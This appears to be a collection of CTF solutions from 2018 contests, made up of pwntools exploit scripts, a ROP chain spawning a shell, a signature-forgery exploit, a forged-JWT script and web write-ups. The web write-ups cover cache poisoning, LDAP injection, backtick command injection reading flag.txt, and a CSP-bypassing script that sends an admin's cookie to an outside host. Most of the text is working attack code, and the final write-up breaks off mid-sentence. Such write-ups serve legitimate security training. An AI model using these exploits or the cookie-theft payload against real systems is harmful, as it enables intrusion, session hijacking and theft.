================================================ FILE: 2018/csaw-quals-2018/ppc/bin_t/exp.py ================================================ #import random, math __author__ = "polaris" outputdebug = False def debug(msg): if outputdebug: print msg class Node(): def __init__(self, key): self.key = key self.left = None self.right = None class AVLTree(): def __init__(self, *args): self.node = None self.height = -1 self.balance = 0; if len(args) == 1: for i in args[0]: self.insert(i) def height(self): if self.node: return self.node.height else: return 0 def is_leaf(self): return (self.height == 0) def insert(self, key): tree = self.node newnode = Node(key) if tree == None: self.node = newnode self.node.left = AVLTree() self.node.right = AVLTree() debug("Inserted key [" + str(key) + "]") elif key < tree.key: self.node.left.insert(key) elif key > tree.key: self.node.right.insert(key) else: debug("Key [" + str(key) + "] already in tree.") self.rebalance() def rebalance(self): ''' Rebalance a particular (sub)tree ''' # key inserted. Let's check if we're balanced self.update_heights(False) self.update_balances(False) while self.balance < -1 or self.balance > 1: if self.balance > 1: if self.node.left.balance < 0: self.node.left.lrotate() # we're in case II self.update_heights() self.update_balances() self.rrotate() self.update_heights() self.update_balances() if self.balance < -1: if self.node.right.balance > 0: self.node.right.rrotate() # we're in case III self.update_heights() self.update_balances() self.lrotate() self.update_heights() self.update_balances() def rrotate(self): # Rotate left pivoting on self debug ('Rotating ' + str(self.node.key) + ' right') A = self.node B = self.node.left.node T = B.right.node self.node = B B.right.node = A A.left.node = T def lrotate(self): # Rotate left pivoting on self debug ('Rotating ' + str(self.node.key) + ' left') A = self.node B = self.node.right.node T = B.left.node self.node = B B.left.node = A A.right.node = T def update_heights(self, recurse=True): if not self.node == None: if recurse: if self.node.left != None: self.node.left.update_heights() if self.node.right != None: self.node.right.update_heights() self.height = max(self.node.left.height, self.node.right.height) + 1 else: self.height = -1 def update_balances(self, recurse=True): if not self.node == None: if recurse: if self.node.left != None: self.node.left.update_balances() if self.node.right != None: self.node.right.update_balances() self.balance = self.node.left.height - self.node.right.height else: self.balance = 0 def delete(self, key): # debug("Trying to delete at node: " + str(self.node.key)) if self.node != None: if self.node.key == key: debug("Deleting ... " + str(key)) if self.node.left.node == None and self.node.right.node == None: self.node = None # leaves can be killed at will # if only one subtree, take that elif self.node.left.node == None: self.node = self.node.right.node elif self.node.right.node == None: self.node = self.node.left.node # worst-case: both children present. Find logical successor else: replacement = self.logical_successor(self.node) if replacement != None: # sanity check debug("Found replacement for " + str(key) + " -> " + str(replacement.key)) self.node.key = replacement.key # replaced. Now delete the key from right child self.node.right.delete(replacement.key) self.rebalance() return elif key < self.node.key: self.node.left.delete(key) elif key > self.node.key: self.node.right.delete(key) self.rebalance() else: return def logical_predecessor(self, node): ''' Find the biggest valued node in LEFT child ''' node = node.left.node if node != None: while node.right != None: if node.right.node == None: return node else: node = node.right.node return node def logical_successor(self, node): ''' Find the smallese valued node in RIGHT child ''' node = node.right.node if node != None: # just a sanity check while node.left != None: debug("LS: traversing: " + str(node.key)) if node.left.node == None: return node else: node = node.left.node return node def check_balanced(self): if self == None or self.node == None: return True # We always need to make sure we are balanced self.update_heights() self.update_balances() return ((abs(self.balance) < 2) and self.node.left.check_balanced() and self.node.right.check_balanced()) def inorder_traverse(self): if self.node == None: return [] inlist = [] l = self.node.left.inorder_traverse() for i in l: inlist.append(i) inlist.append(self.node.key) l = self.node.right.inorder_traverse() for i in l: inlist.append(i) return inlist def preorder_traverse(self): if self.node == None: return [] inlist = [] inlist.append(self.node.key) l = self.node.left.preorder_traverse() for i in l: inlist.append(i) l = self.node.right.preorder_traverse() for i in l: inlist.append(i) return inlist def display(self, level=0, pref=''): ''' Display the whole tree. Uses recursive def. TODO: create a better display using breadth-first search ''' self.update_heights() # Must update heights before balances self.update_balances() if(self.node != None): print '-' * level * 2, pref, self.node.key, "[" + str(self.height) + ":" + str(self.balance) + "]", 'L' if self.is_leaf() else ' ' if self.node.left != None: self.node.left.display(level + 1, '<') if self.node.left != None: self.node.right.display(level + 1, '>') # Usage example if __name__ == "__main__": a = AVLTree() print "----- Inserting -------" inlist = [68,14,45,47,7,59,14,1,54,2,76,90,40,53,95,37,46,68,44,62,14,5,33,92,25,7,15,52,73,32,0,61,69,59,8,11,59,2,52,64,20,87,40,71,45,25,30,9,69,29,51,52,71,38,0,59,37,79,61,30,94,46,83,54,44,90,44,99,79,18,88,42,47,0,26,11,97,0,14,53,31,13,55,49,19,89,43,41,70,76,70,3,58,92,1,58,11,75,13,62] for i in inlist: a.insert(i) #a.display() #print a.inorder_traverse() print ",".join([str(i) for i in a.preorder_traverse()]) ================================================ FILE: 2018/csaw-quals-2018/pwn/alien/exp.py ================================================ #!/usr/bin/env python # encoding: utf-8 __author__ = 'b1gtang' from pwn import * context.terminal = ['tmux', 'splitw', '-h'] BINARY = './aliensVSsamurais' TARGET = ('pwn.chal.csaw.io', 9004) if args.E: # or args.R: LIBC64 = './libc-2.23.so' else: LIBC64 = '/lib/x86_64-linux-gnu/libc.so.6' if args.R: r = remote(TARGET[0], TARGET[1]) else: r = process(BINARY, env={'LD_PRELOAD':LIBC64}) def attach(addr): if addr <= 0x400000: addr = addr + 0x555555554000 gdb.attach(r, gdbscript='b *0x%x' % addr) code = ELF(BINARY) libc = ELF(LIBC64) def new_alien(size, name): r.sendlineafter('Brood mother, what tasks do we have today.\n', '1') r.sendlineafter('How long is my name?\n', str(size)) r.sendlineafter('What is my name?', name) def consume_alien(idx): r.sendlineafter('Brood mother, what tasks do we have today.\n', '2') r.sendlineafter('Which alien is unsatisfactory, brood mother?\n', str(idx)) r.sendlineafter('Daimyo, nani o shitaidesu ka?\n', '3') new_alien(0x10, '0'*0x8) #attach(0xd03) # leak text idx = 0xffffffffffffffff - (0x2020c0 - 0x202070)/8 + 1 r.sendlineafter('Brood mother, what tasks do we have today.\n', '3') r.sendlineafter('which one of my babies would you like to rename?', str(idx)) r.recvuntil('Oh great what would you like to rename ') code.address = u64(r.recv(6)+'\x00\x00') - 0x202070 log.info(hex(code.address)) r.send(p64(code.address + 0x2020c0)) new_alien(0x60, '1'*8) new_alien(0x60, '2'*8) new_alien(0x60, '3'*8) idx = 0xffffffffffffffff - (0x2020c0 - 0x202070)/8 + 1 r.sendlineafter('Brood mother, what tasks do we have today.\n', '3') r.sendlineafter('which one of my babies would you like to rename?', str(idx)) r.recvuntil('Oh great what would you like to rename ') heap = u64(r.recv(6)+'\x00\x00') - 0x450 log.info(hex(heap)) r.send(p64(heap + 0x490)) consume_alien(0) consume_alien(2) consume_alien(1) new_alien(0x60, p64(code.address + 0x20208d)) new_alien(0x60, '5'*8) new_alien(0x60, '6'*8) p = 'x'*3 p += p64(code.address+0x2020a8) p += p64(code.address+0x202058) new_alien(0x60, p) idx = 0xffffffffffffffff - (0x2020c0 - 0x2020a0)/8 + 1 r.sendlineafter('Brood mother, what tasks do we have today.\n', '3') r.sendlineafter('which one of my babies would you like to rename?', str(idx)) r.recvuntil('Oh great what would you like to rename ') libc.address = u64(r.recv(6)+'\x00\x00') - libc.sym['strtoul'] log.info(hex(libc.address)) r.send(p64(libc.sym['system'])) r.sendline('/bin/sh\x00') # flag{s000000000000maa@@@@@nnnnnYYYB@@@@@@neeeelinggs} #0x2020c0- #0x2020c0- #attach(0x400a32) r.interactive() ================================================ FILE: 2018/csaw-quals-2018/pwn/doubletrouble/exp.py ================================================ #!/usr/bin/env python # encoding: utf-8 __author__ = 'b1gtang' from pwn import * import time context.terminal = ['tmux', 'splitw', '-h'] BINARY = './doubletrouble' TARGET = ('pwn.chal.csaw.io', 9002) if args.E: # or args.R: LIBC32 = './libc.so.6' else: LIBC32 = '/lib/i386-linux-gnu/libc.so.6' if args.R: r = remote(TARGET[0], TARGET[1], timeout=5) else: r = process(BINARY, env={'LD_PRELOAD':LIBC32}) def attach(addr): if addr <= 0x400000: addr = addr + 0x555555554000 gdb.attach(r, gdbscript='b *0x%x' % addr) def pp(x): return struct.unpack('d', struct.pack('Q', x))[0] code = ELF(BINARY) libc = ELF(LIBC32) stack = int(r.recvline().strip(), 16) log.info(hex(stack)) print r.recvuntil('How long:') r.sendline('64') for i in xrange(0, 63): r.recvuntil('Give me: ') if i != 4: r.sendline('-1') else: r.sendline('-11') r.recvuntil('Give me: ') r.sendline(str(pp(0x8049506<<32)))#0x8049080 r.recvuntil('Sorted Array:') r.recvuntil('0:') x = r.recvline().strip() libc.address = (u32(struct.pack('d', eval(x))[4:]) + 1 - 0x1b2000) & 0xfffff000 log.info(hex(libc.address)) log.info(str(pp((libc.address+0x3d200)<<32))) print r.recvuntil('How long:') r.sendline('64') for i in xrange(0, 63): r.recvuntil('Give me: ') if i != 3: if args.R: r.sendline(str(pp((libc.address+0x3d200)<<32))) else: r.sendline(str(pp((libc.address+0x3ada0)<<32))) else: r.sendline('-11') r.recvuntil('Give me: ') r.sendline(str(pp(0x804977f<<32)))#0x8049080 r.recvuntil('66:') r.sendline('aaaa'+p32(0x0804A12d)) r.interactive() ================================================ FILE: 2018/csaw-quals-2018/pwn/plc/exp.py ================================================ import interact import struct # https://wargames.ret2.systems/csaw_2018_plc_challenge def validate_checksum(code): r = 0 for i in xrange(2,0x200): r = (((r << 0xc) | (r >> 4)) + i) ^ struct.unpack('H', code[2*i:][:2])[0] r &= 0xffff return struct.pack('H', r) p = interact.Process() # leak text code = 'FWxx12' code += '81' code += '2a'*64 code += '2b'*4 code += '9' code = code.ljust(0x400,'\x00') code = code.replace('xx',validate_checksum(code)) p.readuntil(' ') p.sendline('U') p.readuntil(' ') p.sendline(code) p.readuntil('FIRMWARE UPDATE SUCCESSFUL!') p.sendline('E') p.readuntil('ENRICHMENT PROCEDURE IS RUNNING') p.sendline('S') p.readuntil('bbbb') text = struct.unpack('Q', p.recv(6)+'\x00\x00')[0] - 0xab0 print 'text ' + hex(text) # leak libc code = 'FWxx12' code += '81' code += '2a'*64 code += '2b'*4 code += '2c'*8 code += '9' code = code.ljust(0x400,'\x00') code = code.replace('xx',validate_checksum(code)) p.readuntil(' ') p.sendline('U') p.readuntil(' ') p.sendline(code) p.readuntil('FIRMWARE UPDATE SUCCESSFUL!') p.sendline('E') p.readuntil('ENRICHMENT PROCEDURE IS RUNNING') p.sendline('S') p.readuntil('c'*8) libc = struct.unpack('Q', p.recv(6)+'\x00\x00')[0] - 0x36ec0 print 'libc ' + hex(libc) # rpm_alter -> pivot pivot =text + 0xecb pivot_pack = struct.pack('Q', pivot) code = 'FWxx12' code += '81' code += '2a'*64 code += '2b'*4 code += '7'*69 for i in xrange(8): code += '2' + pivot_pack[i] code += '9' code = code.ljust(0x400,'\x00') code = code.replace('xx',validate_checksum(code)) p.readuntil(' ') p.sendline('U') p.readuntil(' ') p.sendline(code) p.readuntil('FIRMWARE UPDATE SUCCESSFUL!') p.sendline('E') payload = 't'*(0x400-0x70) payload += struct.pack('Q', libc + 0x0000000000033544) # pop rax;0 payload += struct.pack('Q', 0x3b) payload += struct.pack('Q', libc + 0x00000000001150c9) payload += struct.pack('Q', 0x0) payload += struct.pack('Q', 0x0) payload += struct.pack('Q', libc + 0x0000000000021102) # pop rdi; payload += struct.pack('Q', libc + 0x18cd57) payload += struct.pack('Q', libc + 0x00000000000bc375) #syscall payload = payload.ljust(0x400, '\x00') p.sendline(payload) # p.sendline('cat flag') # flag{1s_thi5_th3_n3w_stuxn3t_0r_jus7_4_w4r_g4m3} p.interactive() ================================================ FILE: 2018/csaw-quals-2018/web/hackermovie/README.md ================================================ After access this site, find a strange header: ``` HTTP/1.1 200 OK Server: gunicorn/19.9.0 Date: Mon, 17 Sep 2018 12:39:10 GMT Content-Length: 523 Content-Type: application/octet-stream Last-Modified: Fri, 14 Sep 2018 03:54:50 GMT Cache-Control: public, max-age=43200 Expires: Tue, 18 Sep 2018 00:39:10 GMT ETag: "1536897290.0-523-1486424030" Access-Control-Allow-Origin: * Access-Control-Allow-Methods: HEAD, OPTIONS, GET Access-Control-Max-Age: 21600 Access-Control-Allow-Headers: X-Forwarded-Host X-Varnish: 147513532 Age: 0 Via: 1.1 varnish-v4 Accept-Ranges: bytes Connection: keep-alive Proxy-Connection: keep-alive ``` Guess it may be a Web Cache Poison attack, and we can also find the following content in response: ```json { "admin": false, "movies": [ ... { "admin_only": true, "length": "22 Hours, 17 Minutes", "name": "[REDACTED]", "year": 2018 } ] } ``` So it's clear that we can get flag by poison the cache and then report it to admin. To get the movie list, we can add ```` to the main.mst and put it on our server, then poison cache with the following script: ```python #!/usr/bin/env python # -*- coding: utf-8 -*- import requests host = 'ourip' while True: r = requests.get("http://d05dfb9b052433fb53dbc435cc82838b069d9e2e.hm.vulnerable.services/cdn/app.js", headers={'X-Forwarded-Host': host}) if host in r.content: print 'success' break ``` One thing we need be careful is that we should add cors headers to allow ``hm.vulnerable.services`` fetch our site. ``` Access-Control-Allow-Origin: * Access-Control-Allow-Methods: HEAD, OPTIONS, GET Access-Control-Max-Age: 21600 Access-Control-Allow-Headers: X-Forwarded-Host ``` After success, just report it, and we will receive the flag on our server. ``` GET /WarGamesKung%20FurySneakersSwordfishThe%20Karate%20KidGhost%20in%20the%20ShellSerial%20Experiments%20LainThe%20MatrixBlade%20RunnerBlade%20Runner%202049HackersTRONTron:%20LegacyMinority%20ReporteXistenZflag%7BI_h0pe_you_w4tch3d_a11_th3_m0v1es%7D ``` ================================================ FILE: 2018/csaw-quals-2018/web/ldab/README.md ================================================ Fuzz for a while, find if search ``*`` and ``)`` would return something different, consider title ``ldab``, guess it's a LDAP injection. try ``objectclass``, but do not find anything useful, seems flag is in this table, but there add some condition to make it invisible. So after we closed condition by ``*)))%00``, we will see the flag. flag{ld4p_inj3ction_i5_a_th1ng} ================================================ FILE: 2018/csaw-quals-2018/web/novuln/README.md ================================================ > Especially thanks to [rebirth](https://github.com/rebirthwyw) who help me a lot when finishing this write-up. Access site ``http://no.vulnerable.services/``, we can found two useful things here, first, it's CSP: ``` Content-Security-Policy: default-src 'none'; script-src *.no.vulnerable.services https://www.google.com/ https://www.gstatic.com/; style-src *.no.vulnerable.services https://fonts.googleapis.com/ 'unsafe-inline'; img-src *.no.vulnerable.services; font-src *.no.vulnerable.services https://fonts.gstatic.com/; frame-src https://www.google.com/ ``` And something like a hint in the footer: ``` Served By: d8a50228.ip.no.vulnerable.services ``` After try sometimes, we found that ``d8a50228`` is the hex format of ``216.165.2.40`` and ``hex(ip).ip.no.vulnerable.services`` would return correspond ip. So we can use this feature to bypass the CSP. Put the following js script on our site. ```javascript var img = document.createElement("img"); img.src = "http://7bce41c0.ip.no.vulnerable.services/?cookie=" + encodeURI(document.cookie); document.body.appendChild(img); ``` And submit the following content: ```html ``` Then we can see the following record on our server. ``` GET /?cookie=PHPSESSID=ri4r4q1ujkd0rh2fefvcvnfkt0 http://admin.no.vulnerable.services/review.php?id=237 ``` Use this cookie visit ``http://admin.no.vulnerable.services``, we will see ``admin.no.vulnerable.services/lb.php`` and ``support.no.vulnerable.services`` on this website. In ``lb.php``, we can found ``216.165.2.41``, but can not access. If we change host to ``support.no.vulnerable.services``, it would return ``Hacking detected! Denied attempt to proxy to a NVS internal hostname. Your IP has been logged.``. Seems ``216.165.2.41`` is a proxy, so we could use ``{hexip}.ip.no.vulnerable.service`` again. Dig ``support.no.vulnerable.services``, know its ip is ``172.16.2.5``, so we can use ``ac100205.ip.no.vulnerable.services`` to access it. Then we get a page can ping, seems it's a command line injection. After try ``` 127.0.0.`ls` ``` get ``` ping: 127.0.0.flag.txt index.php ping.php: Name or service not known ``` Finally, it's time to get flag: ``` 127.0.0.``cat flag.txt`` ``` => ``` ping: 127.0.0.flag{7672f158167cab32aebc161abe0fbfcaee2868c1}: Name or service not known ``` ================================================ FILE: 2018/csaw-quals-2018/web/sso/README.md ================================================ After access to the website, we will see: ```html

Welcome to our SINGLE SIGN ON PAGE WITH FULL OAUTH2.0!

. ``` Seems we need use oauth to login and access ``/protected``. After try with oauth standard, we will get a token like ``eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0eXBlIjoidXNlciIsInNlY3JldCI6InVmb3VuZG1lISIsImlhdCI6MTUzNjk3MzkwOSwiZXhwIjoxNTM2OTc0NTA5fQ.qfEHpLa78Cp-jNoJ-2xp8_4qnj9TDeqlKllLWWW3o-Q``. But with this token, we will get a response like ``Unauthorized``. Try decode this token: ```json { "type": "user", "secret": "ufoundme!", "iat": 1536973909, "exp": 1536974509 } ``` looks like jwt secret is ``ufoundme!``, so just make a new token which type is ``admin`` and access ``/protected``, we wiil get flag: ``flag{JsonWebTokensaretheeasieststorage-lessdataoptiononthemarket!theyrelyonsupersecureblockchainlevelencryptionfortheirmethods}``. Finally, my payload is here: ```python #!/usr/bin/env python # -*- coding: utf-8 -*- import sys import jwt import time import json # https://github.com/LyleMi/Saker from saker.main import Saker class Cli(Saker): def __init__(self, url): super(Cli, self).__init__(url) def authorize(self, cid): data = { "response_type": "code", "client_id": cid, "redirect_uri": "token", "state": "ok" } self.post("oauth2/authorize", data=data) return self.lastr.url def token(self, cid, code): data = { "code": code, "grant_type": "authorization_code", "client_id": cid, "redirect_uri": "token", "state": "ok" } self.post("oauth2/token", data=data) return self.lastr.content def protected(self, token): headers = { "Authorization": "Bearer " + token, } self.get("protected", headers=headers) print(self.lastr.content) if __name__ == '__main__': url = "http://web.chal.csaw.io:9000/" # site url c = Cli(url) cid = "admin" step = sys.argv[1] if step == "1": code = c.authorize(cid).split("code=")[1].split("&")[0] print(code.split(".")[1].decode("base64")) token = json.loads(c.token(cid, code))["token"] payload = token.split(".")[1] payload = payload + '=' * (4 - len(payload) % 4) print(payload.decode("base64")) elif step == "2": key = "ufoundme!" payload = { "type": "admin", "secret": "ufoundme!", "iat": int(time.time()), "exp": int(time.time()) + 600 } token = jwt.encode(payload, key) c.protected(token) ``` ================================================ FILE: 2018/ctfzone-quals-2018/crypto/SignatureServer/exp.py ================================================ __author__ = "polaris" from pwn import * import base64 import hashlib import time HASH_LENGTH=32 CHECKSUM_LENGTH=4 MESSAGE_LENGTH=32 CHANGED_MESSAGE_LENGTH=MESSAGE_LENGTH+CHECKSUM_LENGTH BITS_PER_BYTE=8 show_flag_command="show flag"+(MESSAGE_LENGTH-9)*"\xff" admin_command="su admin"+(MESSAGE_LENGTH-8)*"\x00" r = remote("crypto-02.v7frkwrfyhsjtbpfcppnu.ctfz.one",1337) context.log_level = "debug" print r.recvline() print r.recvline() def sign(data): payload = "sign:" payload += base64.b64encode(data) r.sendline(payload) a = r.recvline()[:-1] a = a.split(",") a1 = base64.b64decode(a[0]) a2 = base64.b64decode(a[1]) return a1,a2 def eeee(data,sig): payload = "execute_command:" payload += base64.b64encode(data) payload += "," payload += base64.b64encode(sig) r.sendline(payload) return r.recvline() full_sign_key = [["" for pos in range(36)] for data in range(256)] #first 32bytes payload = "\x00"*32 a1,a2 = sign(payload) for i in range(32): full_sign_key[0][i] = a2[i*32:(i+1)*32] #full for i in range(1,256): for j in range(32): full_sign_key[i][j] = hashlib.sha256(full_sign_key[i-1][j]).digest() #test payload = "\x01"*32 a1,a2 = sign(payload) assert(a2[0:32*32]=="".join(full_sign_key[1][:32])) print "32 bytes ok" full_sign_key[0][34] = a2[-64:-32] full_sign_key[0][35] = a2[-32:] byte2 = [] min_byte1 = 255 for i in range(1,256): a1,a2 = sign("su admin"+"\x00"*23+chr(i)) a10 = a1[-4] a11 = a1[-3] byte2.append(a11) a20 = a2[-4*32:-3*32] a21 = a2[-3*32:-2*32] full_sign_key[ord(a10)][32] = a20 full_sign_key[ord(a11)][33] = a21 min_byte1 = min(min_byte1,ord(a10)) print i,repr(a10),repr(a20),repr(a11),repr(a21) print "min:",min_byte1 #for i in range(256): for i in range(min_byte1+1,256): #print full_sign_key[i][32] #print hashlib.sha256(full_sign_key[i-1][32]).digest() if full_sign_key[i][32]=="": full_sign_key[i][32] = hashlib.sha256(full_sign_key[i-1][32]).digest() else: assert(full_sign_key[i][32]==hashlib.sha256(full_sign_key[i-1][32]).digest()) byte2 = set(byte2) i=min_byte1 for j in byte2: while i<256: print i,repr(j) payload = "su admin"+"\x00"*24 sig = "" payload+=(chr(i)+j+"\x00\x00") for d in range(36): sig+=full_sign_key[ord(payload[d])][d] time.sleep(1) assert(len(payload)==36) assert(len(sig)==32*36) print repr(payload) res = eeee(payload,sig) print res if "admin" in res: payload = "sign:" payload += base64.b64encode("show flag") r.sendline(payload) aaa = r.recvline() r.sendline("execute_command:"+aaa) r.interactive() if "sum" in res: i+=1 else: time.sleep(3) payload = "sign:" payload += base64.b64encode("show flag") r.sendline(payload) aaa = r.recvline() r.sendline("execute_command:"+aaa) r.interactive() ================================================ FILE: 2018/ctfzone-quals-2018/crypto/SignatureServer/exp2.py ================================================ __author__ = "polaris" from pwn import * import base64 import hashlib import time HASH_LENGTH=32 CHECKSUM_LENGTH=4 MESSAGE_LENGTH=32 CHANGED_MESSAGE_LENGTH=MESSAGE_LENGTH+CHECKSUM_LENGTH BITS_PER_BYTE=8 show_flag_command="show flag"+(MESSAGE_LENGTH-9)*"\xff" admin_command="su admin"+(MESSAGE_LENGTH-8)*"\x00" r = remote("crypto-02.v7frkwrfyhsjtbpfcppnu.ctfz.one",1337) context.log_level = "debug" print r.recvline() print r.recvline() def sign(data): payload = "sign:" payload += base64.b64encode(data) r.sendline(payload) a = r.recvline()[:-1] a = a.split(",") a1 = base64.b64decode(a[0]) a2 = base64.b64decode(a[1]) return a1,a2 def eeee(data,sig): payload = "execute_command:" payload += base64.b64encode(data) payload += "," payload += base64.b64encode(sig) r.sendline(payload) return r.recvline() """ full_sign_key = [["" for pos in range(36)] for data in range(256)] #first 32bytes payload = "\x00"*32 a1,a2 = sign(payload) for i in range(32): full_sign_key[0][i] = a2[i*32:(i+1)*32] #full for i in range(1,256): for j in range(32): full_sign_key[i][j] = hashlib.sha256(full_sign_key[i-1][j]).digest() #test payload = "\x01"*32 a1,a2 = sign(payload) assert(a2[0:32*32]=="".join(full_sign_key[1][:32])) print "32 bytes ok" full_sign_key[0][34] = a2[-64:-32] full_sign_key[0][35] = a2[-32:] byte2 = [] min_byte1 = 255 for i in range(1,256): a1,a2 = sign("su admin"+"\x00"*23+chr(i)) a10 = a1[-4] a11 = a1[-3] byte2.append(a11) a20 = a2[-4*32:-3*32] a21 = a2[-3*32:-2*32] full_sign_key[ord(a10)][32] = a20 full_sign_key[ord(a11)][33] = a21 min_byte1 = min(min_byte1,ord(a10)) print i,repr(a10),repr(a20),repr(a11),repr(a21) print "min:",min_byte1 #for i in range(256): for i in range(min_byte1+1,256): #print full_sign_key[i][32] #print hashlib.sha256(full_sign_key[i-1][32]).digest() if full_sign_key[i][32]=="": full_sign_key[i][32] = hashlib.sha256(full_sign_key[i-1][32]).digest() else: assert(full_sign_key[i][32]==hashlib.sha256(full_sign_key[i-1][32]).digest()) byte2 = set(byte2) i=min_byte1 for j in byte2: while i<256: print i,repr(j) payload = "su admin"+"\x00"*24 sig = "" payload+=(chr(i)+j+"\x00\x00") for d in range(36): sig+=full_sign_key[ord(payload[d])][d] time.sleep(1) assert(len(payload)==36) assert(len(sig)==32*36) print repr(payload) res = eeee(payload,sig) print res if "admin" in res: payload = "sign:" payload += base64.b64encode("show flag") r.sendline(payload) aaa = r.recvline() r.sendline("execute_command:"+aaa) r.interactive() if "sum" in res: i+=1 else: r.recvline() """ payload = "sign:" payload += base64.b64encode("show flag") r.sendline(payload) aaa = r.recvline() r.sendline("execute_command:"+aaa) r.interactive() ================================================ FILE: 2018/ctfzone-quals-2018/crypto/SignatureServer/server.py ================================================ #!/usr/bin/python import sys import hashlib import logging import SocketServer import base64 from flag import secret from checksum_gen import WinternizChecksum logger = logging.getLogger() logger.setLevel(logging.INFO) ch = logging.StreamHandler(sys.stdout) ch.setFormatter(logging.Formatter("%(asctime)s - %(levelname)s - %(message)s")) logger.addHandler(ch) HASH_LENGTH=32 CHECKSUM_LENGTH=4 MESSAGE_LENGTH=32 CHANGED_MESSAGE_LENGTH=MESSAGE_LENGTH+CHECKSUM_LENGTH BITS_PER_BYTE=8 show_flag_command="show flag"+(MESSAGE_LENGTH-9)*"\xff" admin_command="su admin"+(MESSAGE_LENGTH-8)*"\x00" PORT = 1337 def extend_signature_key(initial_key): full_sign_key=str(initial_key) for i in range(0,255): for j in range(0,CHANGED_MESSAGE_LENGTH): full_sign_key+=hashlib.sha256(full_sign_key[j*HASH_LENGTH+i*CHANGED_MESSAGE_LENGTH*HASH_LENGTH:(j+1)*HASH_LENGTH+i*CHANGED_MESSAGE_LENGTH*HASH_LENGTH]).digest() return full_sign_key class Signer: def __init__(self): with open("/dev/urandom","rb") as f: self.signkey=f.read(HASH_LENGTH*CHANGED_MESSAGE_LENGTH) self.full_sign_key=extend_signature_key(self.signkey) self.wc=WinternizChecksum() self.user_is_admin=False def sign_byte(self,a,ind): assert(0<=a<=255) signature=self.full_sign_key[(CHANGED_MESSAGE_LENGTH*a+ind)*HASH_LENGTH:(CHANGED_MESSAGE_LENGTH*a+ind+1)*HASH_LENGTH] return signature def sign(self,data): decoded_data=base64.b64decode(data) if len(decoded_data)>MESSAGE_LENGTH: return "Error: message too large" if decoded_data==show_flag_command or decoded_data==admin_command: return "Error: nice try, punk" decoded_data+=(MESSAGE_LENGTH-len(decoded_data))*"\xff" decoded_data+=self.wc.generate(decoded_data) signature="" for i in range(0, CHANGED_MESSAGE_LENGTH): signature+=self.sign_byte(ord(decoded_data[i]),i) return base64.b64encode(decoded_data)+','+base64.b64encode(signature) def execute_command(self,data_sig): (data_with_checksum, signature)=map(base64.b64decode,data_sig.split(',')) data=data_with_checksum[:MESSAGE_LENGTH] data_checksummed=data+self.wc.generate(data) if data_checksummed!=data_with_checksum: return "Error: wrong checksum!" signature_for_comparison="" for i in range(0, CHANGED_MESSAGE_LENGTH): signature_for_comparison+=self.sign_byte(ord(data_with_checksum[i]),i) if signature!=signature_for_comparison: return "Error: wrong signature!" if data==admin_command: self.user_is_admin=True return "Hello, admin" if data==show_flag_command: if self.user_is_admin: return "The flag is %s"%secret else: return "Only admin can get the flag\n" else: return "Unknown command\n" def process(data,signer): [query,params]=data.split(':') params=params.rstrip("\n") if query=="hello": return "Hi" elif query=="sign": return signer.sign(params) elif query=="execute_command": return signer.execute_command(params) else: return "bad query" class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler): def handle(self): signer=Signer() logger.info("%s client sconnected" % self.client_address[0]) self.request.sendall("Welcome to the Tiny Signature Server!\nYou can sign any messages except for controlled ones\n") while True: data = self.request.recv(2048) try: ret = process(data,signer) except Exception: ret = 'Error' try: self.request.sendall(ret + '\n') except Exception: break def finish(self): logger.info("%s client disconnected" % self.client_address[0]) class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): pass if __name__ == '__main__': server = ThreadedTCPServer(('0.0.0.0', PORT), ThreadedTCPRequestHandler) server.allow_reuse_address = True server.serve_forever() ================================================ FILE: 2018/ctfzone-quals-2018/ppc/PlusMinus/exp.py ================================================ __author__ = "polaris" from pwn import * context.log_level = "debug" r = remote("ppc-01.v7frkwrfyhsjtbpfcppnu.ctfz.one",2445) while True: a = r.recvline()[:-1].decode() a = a.split(" ") print(a) res = float(a[-1]) data = a[:-1] dp = [[{} for i in range(len(data))] for j in range(len(data))] for i in range(len(data)): dp[i][i][data[i]]=str(data[i]) for i in range(len(data),-1,-1): for j in range(i+1,len(data)): for k in range(i,j): print(i,j,k) for d1 in dp[i][k]: temp1 = dp[i][k][d1] if k>i: temp1 = "("+temp1+")" for d2 in dp[k+1][j]: temp2 = dp[k+1][j][d2] if j>k+1: temp2 = "("+temp2+")" temp = [] temp.append(temp1+"+"+temp2) temp.append(temp1+"-"+temp2) temp.append(temp1+"*"+temp2) temp.append(temp1+"/"+temp2) for t in temp: try: d = eval(t) except: continue dp[i][j][str(d)]=t senddata = "" for d in dp[0][len(data)-1]: if abs(float(d)-res)<0.000001: senddata = dp[0][len(data)-1][d] print(senddata) r.sendline(senddata) print(r.recvline()) ================================================ FILE: 2018/defcon-quals-2018/pwn/babypwn/baby.c ================================================ #include #include #include #include #include #include char asdf[1024]; int main() { long long index = 0; alarm(5); read(0, &index, 1024); read(0, asdf+index, 8); read(0, &index, 1024); } ================================================ FILE: 2018/defcon-quals-2018/pwn/babypwn/solve_babypwn_ref.py ================================================ #!/usr/bin/env python from pwn import * import sys import struct import hashlib import random from threading import Timer context.log_level='debug' # OOO{to_know_the_libc_you_must_become_the_libc} def pow_hash(challenge, solution): return hashlib.sha256(challenge.encode('ascii') + struct.pack(' 0: data = s.recv(length) if data == '': raise EOFError() buf += data length -= len(data) return buf def recv_binary(s): size = recv_exact(s, 4) size = unpack(' { res.render('index', {notices: [process.env.FLAG]}); }); ``` ## RexExp Bypass Obviously, the vulnerable part in the application is adding notes, but we can not inject ``<>`` here. ```javascript const regex = /[<>]/; let errors = []; if (regex.test(req.body.title)) { errors.push('Title is invalid'); } if (regex.test(req.body.content)) { errors.push('Content is invalid'); } if (errors.length !== 0) { return res.render('new', {errors}); } ``` To bypass this regexp, we can use a little trick here: ```javascript regex.test(['a' : '<']) // true regex.test({'a' : '<'}) // false ``` So if we post a dict, we can insert any tag we want. There is one thing which we need pay attention is we can not post dict with ``application/x-www-form-urlencoded`` in express, so we can should use ``application/json`` here. ## CSP Bypass We can inject any tag now, but there has a CSP which we need bypass: ``` default-src 'none'; script-src 'nonce-43fa45e17bdab68f0714216de52b1a08' 'strict-dynamic'; style-src 'self' https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css; img-src 'self'; connect-src 'self'; frame-src https://www.google.com/recaptcha/; form-action 'self'; ``` This part is easy, we could use ```` tag then admin will request ``/javascripts/notes.js`` from our server. ## Final Part After writing a script to get flag, I found there is only a request to get ``/javascripts/notes.js``, no flag. Check the request for some time, I found the ``Refer`` is 